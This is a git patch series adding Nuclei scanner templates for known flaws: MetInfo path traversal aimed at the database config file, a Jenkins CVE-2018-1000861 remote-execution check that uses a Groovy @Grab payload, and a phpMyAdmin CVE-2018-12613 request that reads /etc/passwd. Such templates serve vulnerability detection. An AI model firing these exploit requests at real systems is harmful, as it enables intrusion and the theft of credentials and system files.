From 6e19a6eb4531c14800f878f558b482ba95844d7a Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 20 Feb 2021 07:25:43 +0700 Subject: [PATCH 1/7] Create metinfo-lfi.yaml --- vulnerabilities/other/metinfo-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/metinfo-lfi.yaml diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml new file mode 100644 index 0000000000..f502f05546 --- /dev/null +++ b/vulnerabilities/other/metinfo-lfi.yaml @@ -0,0 +1,26 @@ +id: metinfo-lfi +info: + name: MetInfo 6.0.0/6.1.0 LFI + author: pikpikcu + severity: high + refrence: https://paper.seebug.org/676/ + +requests: + - method: GET + path: + - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php' + - '{{BaseURL}}/include/thumb.php?dir=..././http..././config/config_db.php' + - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php' + - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php' + + matchers-condition: and + matchers: + - type: word + words: + - "con_db_pass" + - "con_db_name" + part: body + condition: and + - type: status + status: + - 200 From 2e5cfa3d42906f54b59f8754e21968e7463f7a6f Mon Sep 17 00:00:00 2001 From: sheikhrishad <51270384+hackerrishad@users.noreply.github.com> Date: Sat, 20 Feb 2021 16:21:07 +0600 Subject: [PATCH 2/7] Update phpinfo.yaml --- exposures/configs/phpinfo.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index 7836d74b54..bfc8c55cd2 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml @@ -19,6 +19,7 @@ requests: - "{{BaseURL}}/pinfo.php" - "{{BaseURL}}/phpversion.php" - "{{BaseURL}}/time.php" + - "{{BaseURL}}/index.php" matchers: - type: word words: From 74479c73096233c53c8e592a7b16214569db3d67 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 20 Feb 2021 18:11:15 +0700 Subject: [PATCH 3/7] Update CVE-2018-1000861 --- cves/2018/CVE-2018-1000861.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2018/CVE-2018-1000861.yaml diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml new file mode 100644 index 0000000000..4e8c3f19d2 --- /dev/null +++ b/cves/2018/CVE-2018-1000861.yaml @@ -0,0 +1,25 @@ +id: CVE-2018-1000861 + +info: + name: Jenkins 2.138 Remote Command Execution + author: dhiyaneshDK & @pikpikcu + severity: critical + reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 + tags: cve,cve2018,jenkin,rce + +requests: + - method: GET + path: + - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;' + + matchers-condition: and + matchers: + + - type: word + words: + - "package#vulntest" + part: body + + - type: status + status: + - 200 From e02d062fa4b9a1c5bbb0f979bb5aa985b6a53de5 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 20 Feb 2021 18:58:59 +0700 Subject: [PATCH 4/7] Create CVE-2018-12613.yaml --- cves/2018/CVE-2018-12613.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2018/CVE-2018-12613.yaml diff --git a/cves/2018/CVE-2018-12613.yaml b/cves/2018/CVE-2018-12613.yaml new file mode 100644 index 0000000000..d9db64353f --- /dev/null +++ b/cves/2018/CVE-2018-12613.yaml @@ -0,0 +1,25 @@ +id: CVE-2018-12613 + +info: + name: PhpMyAdmin 4.8.1 Remote File Inclusion + author: pikpikcu + severity: critical + reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 + tags: cve,cve2018,phpmyadmin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200 From 18d1384c083ffa1b495eb76cf3744de1490ab5cc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 20 Feb 2021 19:17:47 +0530 Subject: [PATCH 5/7] Update CVE-2018-1000861.yaml --- cves/2018/CVE-2018-1000861.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml index 4e8c3f19d2..ffecdfff4b 100644 --- a/cves/2018/CVE-2018-1000861.yaml +++ b/cves/2018/CVE-2018-1000861.yaml @@ -1,7 +1,7 @@ id: CVE-2018-1000861 info: - name: Jenkins 2.138 Remote Command Execution + name: Jenkins 2.138 Remote Command Execution author: dhiyaneshDK & @pikpikcu severity: critical reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 From 5ffc1aa211272f0302f660734b73d4db7698e78e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 20 Feb 2021 19:24:20 +0530 Subject: [PATCH 6/7] Update metinfo-lfi.yaml --- vulnerabilities/other/metinfo-lfi.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml index f502f05546..9a794bbcb0 100644 --- a/vulnerabilities/other/metinfo-lfi.yaml +++ b/vulnerabilities/other/metinfo-lfi.yaml @@ -3,13 +3,13 @@ info: name: MetInfo 6.0.0/6.1.0 LFI author: pikpikcu severity: high - refrence: https://paper.seebug.org/676/ + reference: https://paper.seebug.org/676/ + tags: metinfo,lfi requests: - method: GET path: - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php' - - '{{BaseURL}}/include/thumb.php?dir=..././http..././config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php' From 115c337512d10718ecc6d8344da7d85cebb244db Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 20 Feb 2021 13:56:17 +0000 Subject: [PATCH 7/7] Auto Update README [Sat Feb 20 13:56:17 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 22ae188369..8a03b1ecd3 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 198 | vulnerabilities | 91 | exposed-panels | 74 | +| cves | 200 | vulnerabilities | 92 | exposed-panels | 74 | | exposures | 47 | technologies | 46 | misconfiguration | 43 | | workflows | 21 | miscellaneous | 12 | default-logins | 10 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**61 directories, 573 files**. +**61 directories, 576 files**.